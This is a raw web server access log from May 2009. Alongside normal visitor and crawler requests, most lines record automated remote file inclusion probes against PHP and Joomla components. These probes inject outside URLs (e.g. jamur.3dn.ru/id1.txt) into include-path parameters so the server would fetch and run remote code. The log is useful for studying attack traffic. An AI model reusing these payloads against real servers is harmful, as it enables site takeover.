150.150.153.222 - - [29/May/2009:04:52:21 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; IPMS/DE999696-14A1F9F6666; InfoPath.1)"
150.150.153.222 - - [29/May/2009:04:52:21 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; IPMS/DE999696-14A1F9F6666; InfoPath.1)"
218.249.36.194 - - [29/May/2009:04:52:53 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:52:53 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:52:53 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:04:52:59 -0400] "GET /?sourcedir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:04:52:59 -0400] "GET /logs/?sourcedir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 200 3294 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:04:52:59 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:53:18 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:53:18 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:53:18 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:53:30 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:53:30 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:53:30 -0400] "GET /logs/access_log.Q109051100/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:53:30 -0400] "GET /logs/access_log.Q108121900/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
41.248.241.51 - - [29/May/2009:04:54:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
41.248.241.51 - - [29/May/2009:04:54:14 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
81.137.226.190 - - [29/May/2009:04:54:15 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
41.248.241.51 - - [29/May/2009:04:54:19 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
41.248.241.51 - - [29/May/2009:04:54:19 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
72.18.148.82 - - [29/May/2009:04:54:45 -0400] "GET /logs/access_log.Q109051100%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:54:53 -0400] "GET /logs/access_log.Q108121900%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.68.17 - - [29/May/2009:04:55:08 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L006F463D1C583000992808P+WSEQ(S0060):1+OUITEM(A0200):5099003 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [29/May/2009:04:55:48 -0400] "GET /logs/access_log.Q109052300%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:55:48 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:56:06 -0400] "GET /logs/access_log.Q109052300%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:56:06 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:56:12 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:56:24 -0400] "GET /logs/access_log.Q109052300//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:04:56:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.175.122.228 - - [29/May/2009:04:57:37 -0400] "GET /logs/access_log.Q109051700%20%20//?path%5Bdocroot%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:58:13 -0400] "GET /logs/access_log.Q109051000//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:05:00:16 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:05:00:16 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:05:00:16 -0400] "GET /logs/access_log.Q109051100%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:05:00:16 -0400] "GET /logs/access_log.Q108121900%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:05:00:35 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:05:00:41 -0400] "GET /logs/access_log.Q109052300//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
70.89.181.197 - - [29/May/2009:05:01:52 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.813"
70.89.181.197 - - [29/May/2009:05:01:53 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.813"
70.89.181.197 - - [29/May/2009:05:01:53 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.813"
121.165.73.157 - - [29/May/2009:05:02:12 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:05:02:29 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:05:02:29 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:05:02:32 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:05:02:33 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:05:02:33 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:05:02:39 -0400] "GET /logs/access_log.Q109050300%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:05:02:50 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:05:02:50 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:05:02:50 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:05:03:15 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:05:03:38 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
220.181.7.97 - - [29/May/2009:05:03:39 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
62.146.68.61 - - [29/May/2009:05:04:49 -0400] "GET /logs/access_log.Q109051100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:05:05:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.146.68.61 - - [29/May/2009:05:05:23 -0400] "GET /logs/access_log.Q109051100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:05:05:31 -0400] "GET /logs/access_log.Q109051500//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
70.89.181.197 - - [29/May/2009:05:05:41 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.813"
62.146.68.61 - - [29/May/2009:05:06:12 -0400] "GET /logs/access_log.Q109051500//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.121.174.74 - - [29/May/2009:05:06:57 -0400] "GET /logs/access_log.Q109052100%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.121.174.74 - - [29/May/2009:05:06:57 -0400] "GET //tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
91.121.174.74 - - [29/May/2009:05:06:57 -0400] "GET /logs//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.221.130.17 - - [29/May/2009:05:07:01 -0400] "GET //tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
77.221.130.17 - - [29/May/2009:05:07:01 -0400] "GET /logs/access_log.Q109052100%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.221.130.17 - - [29/May/2009:05:07:01 -0400] "GET /logs//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.130.29.11 - - [29/May/2009:05:07:04 -0400] "GET /logs/solpot.html?body=http://www.arrimage-im.qc.ca//file/data/1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
121.130.29.11 - - [29/May/2009:05:07:04 -0400] "GET /solpot.html?body=http://www.arrimage-im.qc.ca//file/data/1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:05:07:09 -0400] "GET /logs/solpot.html?body=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:05:07:09 -0400] "GET /solpot.html?body=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:05:07:09 -0400] "GET /solpot.html?body=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:05:07:09 -0400] "GET /logs/solpot.html?body=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:05:07:09 -0400] "GET /solpot.html?body=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
110.45.145.92 - - [29/May/2009:05:07:14 -0400] "GET /logs/solpot.html?body=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
122.153.212.195 - - [29/May/2009:05:07:22 -0400] "GET /solpot.html?body=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
122.153.212.195 - - [29/May/2009:05:07:22 -0400] "GET /logs/solpot.html?body=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:05:07:49 -0400] "GET /logs/access_log.Q109051100/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:05:07:54 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.221.130.17 - - [29/May/2009:05:07:57 -0400] "GET /logs/access_log.Q109051000%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:05:08:02 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.174.74 - - [29/May/2009:05:08:23 -0400] "GET /logs/access_log.Q109051000%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:05:08:25 -0400] "GET //tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:05:08:25 -0400] "GET /logs/access_log.Q109052100%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:05:08:25 -0400] "GET /logs//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.6.8.108 - - [29/May/2009:05:08:38 -0400] "GET /index.htm HTTP/1.0" 200 870 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.146.68.61 - - [29/May/2009:05:09:17 -0400] "GET /logs/error_log.Q109051100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:05:09:26 -0400] "GET /logs/access_log.Q109051000%20%20//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.221.130.17 - - [29/May/2009:05:09:31 -0400] "GET /logs/access_log.Q109052100//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.11.230.36 - - [29/May/2009:05:10:07 -0400] "GET /logs/access_log.Q109051100%20%20//include/bbs.lib.inc.php?site_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.11.230.36 - - [29/May/2009:05:10:07 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
66.11.230.36 - - [29/May/2009:05:10:07 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.221.130.17 - - [29/May/2009:05:10:12 -0400] "GET /logs/access_log.Q109051000//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:05:10:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.64.38 - - [29/May/2009:05:11:45 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.249.36.194 - - [29/May/2009:05:11:51 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:05:11:51 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:05:11:51 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:05:11:54 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:05:11:54 -0400] "GET /logs/access_log.Q109050700//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:05:11:54 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.11.230.36 - - [29/May/2009:05:12:03 -0400] "GET /logs/error_log.Q109051100%20%20//include/bbs.lib.inc.php?site_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:05:12:53 -0400] "GET ///vwar/backup/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:05:12:53 -0400] "GET /logs///vwar/backup/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:05:12:53 -0400] "GET /logs/access_log.Q109052100%20%20///vwar/backup/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.72.93 - - [29/May/2009:05:13:13 -0400] "GET /logs/access_log.Q109051000//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.122.72.93 - - [29/May/2009:05:13:13 -0400] "GET //tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
222.122.72.93 - - [29/May/2009:05:13:13 -0400] "GET /logs//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.174.74 - - [29/May/2009:05:14:02 -0400] "GET /logs/access_log.Q109052100//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:05:14:16 -0400] "GET /logs/access_log.Q109051100/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.27.203.107 - - [29/May/2009:05:14:26 -0400] "GET //include/lib.inc.php?site_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.27.203.107 - - [29/May/2009:05:14:26 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.27.203.107 - - [29/May/2009:05:14:26 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.27.203.107 - - [29/May/2009:05:14:44 -0400] "GET /logs/access_log.Q109052300/errors.php?error=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.27.203.107 - - [29/May/2009:05:15:00 -0400] "GET /logs/access_log.Q109050900//include/lib.inc.php?site_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
201.134.110.45 - - [29/May/2009:05:15:01 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
201.134.110.45 - - [29/May/2009:05:15:01 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
201.134.110.45 - - [29/May/2009:05:15:01 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
201.134.110.45 - - [29/May/2009:05:15:02 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
123.125.64.49 - - [29/May/2009:05:15:08 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [29/May/2009:05:16:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [29/May/2009:05:16:28 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:05:16:28 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:05:16:28 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
